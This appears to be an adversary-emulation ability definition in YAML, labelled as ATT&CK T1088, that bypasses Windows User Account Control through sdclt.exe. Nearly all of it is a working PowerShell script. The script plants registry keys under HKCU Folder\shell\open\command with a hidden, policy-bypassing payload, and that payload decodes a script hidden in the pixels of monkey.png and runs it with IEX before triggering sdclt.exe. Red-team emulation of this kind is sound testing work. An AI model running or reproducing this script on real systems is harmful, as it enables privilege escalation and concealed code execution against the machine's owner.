---

- id: 89e9dffa-8836-4672-8cf3-bebd006d2a2b
  name: 3.B - UAC Bypass via Backup Utility
  description: Modify registry values of sdclt to bypass UAC
  tactic: privilege-escalation
  technique:
    attack_id: T1088
    name: Bypass User Account Control
  platforms:
    windows:
      psh,pwsh:
        command: |
          if (!(test-path -path $env:windir\system32\sdclt.exe)) {
            write-host "[!] sdclt.exe was not found on this host.";
            exit 1;
          }
          New-Item -Path HKCU:\Software\Classes -Name Folder -Force;
          New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force;
          New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force;
          New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force;

          $username="client1";
          $payload='powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName "System.Drawing"; $g=a System.Drawing.Bitmap("C:\Users\$($username)\Downloads\monkey.png");$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"';

          Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)" -Value $payload -Force;
          Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Value "" -Force;

          cmd.exe /c sdclt.exe;
          cmd.exe /c powershell.exe;
